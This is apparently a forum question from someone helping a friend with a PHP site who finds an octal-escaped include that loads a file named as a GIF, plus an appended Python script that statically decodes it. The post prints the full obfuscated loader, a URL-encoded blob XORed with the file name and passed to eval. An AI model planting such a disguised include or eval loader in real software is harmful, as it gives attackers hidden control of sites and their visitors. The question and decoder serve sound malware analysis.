I'm helping out a friend with a PHP website he has been running for a few years. He is not a PHP developer, so he asked if I could help him out.
I downloaded the contents of the server files onto my laptop and found a strange hex code embedded at the top of the page:
<?php @include("\164\166\163\150\157\167\163\057\151\155a\147\145\163\057so\162\164-\062\170.\147i\146");?>
This didn't look like any PHP code I'd ever seen before, so I decoded it, and it basically said 'tvshows/images/sort-2x.gif'. And so I thought, "hmmm, that's really weird".
So when I go to the file, it is just PHP code. But here is the weird part: a huge file filled with URL-encoded characters.
<?php $_c62un = basename(trim(preg_replace(rawurldecode("%2F%5C%28.%2A%24%2F"), '', __FILE__)));$_cx4pt = "~e2%1DC%5B%27%5D%02%1DNT%0A%00%06B%40%27B%08%0EA_O%3C%21a~Q%15jc%26%1A%01%1B%2B%5EW%0C%06%40%05%09%140%17%06_%5D%0A%5D%40EFCFIy%27r%11%40%0E6%15%16%1BZS%40S%00q%02%11%03%10%1A%06%1DB%5C%27Z%0E%04%03TCRD%04%09u%24%27%0C%14%01%00%00%2B_W%08A%15%1D%0F%1D%08ZD%04%09u%24%27%1A%03%070%06%1D%40W%27B%0E%04%0F%07GB%5D%16%3Fr%23m%00%00SGS%10HT%11%40%02%0DNT%09%1B%18Hm%08%5B%136%05%16%01%06%1BCF%0B%0E%40%40O~e%09y%27%12X%0EG%0D%03%15%06%1C%11%05%15%1EG%0B%0C9%03%1A%06%2BNW%16Z%08%07%12%00OUX%0D%03Q%15jckyORT%0D%16%0F%5D%00%00%01%0A%00RI%0D%15%1B%1F%03Y%05%16X%14Y%1DV%1CKJ%5DSC%5C_L%1DVM%03_ZPGXA%15%14%0BA%1F%5EN%5D~eRT%0D%12%1FB%08%0B%07%1FOV%03%5EU%11I%1E%06%5D~e%7F~%0D%12X%0E%0E%0FF%5BN%14%01CQ%0CG%08%079%16%17%1B%07YAP%09%01%00%0A%160%15%11Ym%1BA%09%1D%03%1D%1B%01S%04%1Bu%24GIFS%14%7F~%0D%12X%0EGIFS%09%07%1ANF%11A%09I%00%1A%03%17%2BJW%0Cq%04%06%08%07%0A%1C%00%5E%1A%5CV%13%00%01%09%08%5By%27%12X%0EGIFSO%09y%27%12X%0EGIFSORT%0D%12%5CE%0E%06%15%17%0E%0A%05%0D%0FXH%08%19%03%1DGV%0CY%5B%1FT%00EFQ%1DP%5D%16%3Fr%0EGIFSORT%0D%12X%0EC%1D%0E%02%18%02%15G%12E%0E%01%1B%03%12%0BZPF%5B%17%5D%03%08%1E%02CR%12D%5E%1D%5D%0E%13%03%5BK%0A%00DU%02IN%40%5D~eRT%0D%12X%0EGIFSOR%12N%5E%17%5D%02AB%18%06%1D%07IS%00_NRkyORT%0D%12X%0EGIFSO%00%11YG%0A%40GM%12%1B%1E%05%04LXC%23mIFSORT%0D%12%05%23mIFSO%0Fy%27%12X%0EG%0F%13%1D%0C%06%1DB%5CXM%10%19%09%15%19%16%5C%04%3Fr%0EGIF%08bxT%0D%12X%0EGIF%01%0A%06%01_%5CXZ%15%00%0B%5B%1F%00%11Jm%0AK%17%05%07%10%0AZV%02nP%00M5B%5CM%5ET%0A%15T%0E86%20%3A%237%2Br%1BQ%15jcFSOR%09%208u%24GIFS%09%07%1ANF%11A%09I%17%04%08%1D%0CD%5C%08%06C%1D%1F%1C%01%06%1F%40%1EX%0A%00%1D%10%0B%15%0A%1D%04%3Fr%0EGIF%08bxT%0D%12X%0EGIFW%03%05%1FK%5D%01ZGTFQMIy%27%3Fr%0EGIFSORTK%5D%0A%0EOM%1C%15%16%17%0DKY%09%13WRFW%15%14%0DHK%1EE%16IZS%1C%06%06AW%16%06C%1D%1F%1C%01%06%1F%40%1BC%07jcFSORT%0D%12XUjcFSORT%0D%12X%0EGIF%15%00%00T%05%16%0AJ%0A%13%0A%1ERBO%0D%16%0AJ%0A%13%0A%1ES%01%00_%5E%1D%4
0OM%01%07%19%0A%0EU%5BQ%0EAOFW%15%14%0DHK%1EE%16U%15%07%1D%1E%11C%1A%5CZ%1E%06%08%07%04%1F%5D%16%12%5C%5C%03%04%1C%1F%02Y_%01%12%5CT%01%10%03%0A%09%19%05%06%19Q%23mIFSORT%0D%12X%0EGI%1D~eRT%0D%12X%0EGIFSORT%0D%12X%0A%0B%1E%0D%15%00%0B%00%0D%1CE%0E%04%01%14%5B%00%00%10%05%16%0CW%08%07%12%18%02%29PWT%01K%1E%0F%0D%022%5BTs%12%17%5C%03AB%14%1B%04%0CWJ%11uC%1B%02%1E%15%1E%19p%1BQ%15jcFSORT%0D%12X%0EGIF%0EbxT%0D%12X%0EGIF%0Ebxy%27%12X%0EGIFSO%00%11YG%0A%40GM%0A%04%04%14%1BTFC%23mIFSO%0Fy%27%3Fr%0EGIF%15%1A%1C%17Y%5B%17%40G%03%04%01%01%02%01_%1A%5CZ%1E%06%08%07%04%1FX%0D%16%1FZ%11%11%1C%0B%06%5By%27%12X%0EG%12kyORT%0D%12X%0EG%0E%0A%1C%0D%13%18%0D%16%0F%5D%00%00%01%0A%00Iy%27%3Fr%0EGIFSORT_W%0C%5B%15%07F%02%18%15%1BU%5B%16%5EO%18%11%14%00%0A%1DCBP%0A%13%10%09%1D%1B%19%19%01%12%5CI%13%1F%1E%09%17%1B%5D%01%12%5CY%14%0E%0F%14%16%1D%5D%16%3Fr%0EGIF%0Ebxy%27%3Fr%0EGIF%15%1A%1C%17Y%5B%17%40G%00%0D%14%0B%10%1FT%1AQ%23mIFSO%09y%27%12X%0EGIFSOV%06_%5C%15O%10I%5BS%09%1B%18Hm%1FK%136%05%1C%01%06%11CF%0B%06%04%1E%16%1C%09%04%10%05%1BQ%15jcFSORT%0D%12X%0A%1E%08%15%1E%1F%08%1B%0D%0FX%5D%13%1B%16%1C%1CZP_%40%16C%06%1EJS%02%16A%05P%19%5D%02%07%07%1E%0AZ%17ZB%17H%11%0DNZF%5B%5D%16%3Fr%0EGIFSORTDTX%06C%10%07%00%02%02%0EB%12Y%13ZI%202%23%211%04%3Fr%0EGIFSORTV%3Fr%0EGIFSORT%0D%12X%0EC%0E%0C%12%04%00%1CKGX%13G%1A%13%11%1C%06%06%05%16%0A%5C%09%04%07%04CRPTS%0BC%17%13%09SDRB%19%1BC%23mIFSORT%0D%12X%0EGIB%1B%15%15%02XGX%13G%1C%08%00%0A%00%1DL%5E%11T%02A%0C%11%1D%1C%04X%40P%5C%06%1E%13%01%03%16%11N%5D%1CKOM%01%19%0E%19%06ET%0D%07KI%0B%17ZZ%16LA%1D%40%06%04%03%5B%0C%05%04BT%0EJO%40OZF%5BO%208X%0EGIFSOR%09%208X%0EGIFSOR%11AA%1D%23mIFSORT%0D%12%03%23mIFSORT%0D%12X%0EGIB%1B%15%15%02XGX%13G%28%14%01%0E%0B%5C%04%09u%24GIFSORT%0DOu%24GIFSORT%0D%40%1DZ%12%1B%08SK%1A%0EJD%0D%5B%5CdlSORTP%3Fr%23mIFSO%14%01CQ%0CG%08%07F%14%09%17%11CH%00%06C%19%0C%19%18%0B%03AKE%602%25%2AZbxT%0D%12XUjcFSORT%0D%12XH%08%1B%03%12%0C%1AT%05%5B%13I%03%0B%0D%0AG%5BTLAX%0A%00%0C%04%06%15%16%1D%0D%0FF%0EC%13%00%0A%0A%0B%12FC%16W%10%08
%05%00%16%5By%27%12X%0EGIFSO%09y%27%12X%0EGIFSORT%0D%12%11HGAB%03%05%18%03TE%14WNdlSORT%0D%12X%0EGIFS%14%7F~%0D%12X%0EGIFSORT%0D%12X%0EG%00%00SG%01%00_Q%15%5EOM%16%19%05%05%0DZ%5E%01%02GM%01%16%0D%07%0EI%5BQ%0EZTFCF%7F~%0D%12X%0EGIFSORT%0D%12X%0EG%12kyORT%0D%12X%0EGIFSORT%0D%12X%0EGI%03%05%0E%1E%5C%09H%1EW%02%10%00%18%1E%1C%0DZS%1B%5D%1E%40%5D~eRT%0D%12X%0EGIFSORT%0D%12X%0EGIF%11%1D%17%15F%09u%24GIFSORT%0D%12X%0EGIFSO%0Fy%27%12X%0EGIFSORT%0D%12%05%23mIFSORT%0D%12X%0EGI%03%1F%1C%17y%27%12X%0EGIFSORT%0D%12%03%23mIFSORT%0D%12X%0EGIFSOR%11%5BS%14%06C%13%00%0A%0A%0B%12FC%16W%10%08%05%00%16%5BO%208X%0EGIFSORT%0D%12XSjcFSORT%0D%12XSjcFSOR%09%208u%24GIFS%08%14%11H%5C%02VO%40%5D~e%0F";eval(rawurldecode($_cx4pt) ^ substr(str_repeat($_c62un, (strlen($_cx4pt)/strlen($_c62un)) + 1), 0, strlen($_cx4pt)));
There's more than just this, but the rest appears to be commented out. But it is thousands of characters long.
Now I tried to decode it, but it didn't seem to make any sense to me. I uploaded the whole file to some site which said it could decode the thing, but it just returned a random .bin file.
My gut is telling me this is probably malware or possibly a virus. Is there any way I can verify what this is, or how I can decode the entire .gif file? Should I delete it ASAP? Or is it harmless?
I know very little about security except to say this looks very suspicious to me.
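Added example (not code from the post or from the site in question): a Python helper that decodes the octal-escaped include path and statically recovers the text the `$_cx4pt` loader would hand to `eval()`, without executing any PHP. The XOR key is `basename(__FILE__)` with any `(...` suffix stripped, so decoding must use the name the file was dropped under; the loader string used below is a constructed fixture in the same shape as the one in the question, and `build_sample` and the `/var/www/...` path are assumptions.

```python
import re
from urllib.parse import quote, unquote

# The octal-escaped include path quoted in the question's first snippet.
INCLUDE_LITERAL = r"\164\166\163\150\157\167\163\057\151\155a\147\145\163\057so\162\164-\062\170.\147i\146"


def decode_php_octal(s: str) -> str:
    """Resolve PHP double-quoted \\NNN octal escapes to plain characters."""
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), s)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR against a repeated key, mirroring
    rawurldecode($_cx4pt) ^ str_repeat($_c62un, ...) in the loader."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_loader(php_source: str, file_path: str) -> str:
    """Recover what eval() would receive, from the loader text and the path
    the file lived at on the server. Renaming the file changes the key, so
    keep the original name when analysing a copy offline."""
    key = re.sub(r"\(.*$", "", file_path).strip().rsplit("/", 1)[-1]
    m = re.search(r'\$_cx4pt\s*=\s*"([^"]*)"', php_source)
    if not m:
        raise ValueError("no $_cx4pt payload string found")
    payload = unquote(m.group(1), encoding="latin-1")  # rawurldecode, byte-for-byte
    return xor_with_key(payload.encode("latin-1"), key.encode()).decode("latin-1")


def build_sample(plaintext: str, file_name: str) -> str:
    """Constructed test fixture (assumption): a loader with the same layout as
    the one in the question, so decode_loader can be exercised offline. The
    real blob from the server is not reproduced here."""
    enc = quote(xor_with_key(plaintext.encode(), file_name.encode()), safe="")
    return ('<?php $_c62un = basename(__FILE__);$_cx4pt = "' + enc +
            '";eval(rawurldecode($_cx4pt) ^ $_c62un);')


if __name__ == "__main__":
    print(decode_php_octal(INCLUDE_LITERAL))  # tvshows/images/sort-2x.gif
    sample = build_sample('echo "constructed sample";', "sort-2x.gif")
    print(decode_loader(sample, "/var/www/tvshows/images/sort-2x.gif"))
```

Running `decode_loader` on the real file (with its original name as the key) shows the second-stage PHP in clear text, which is what to inspect before deciding whether the site is compromised.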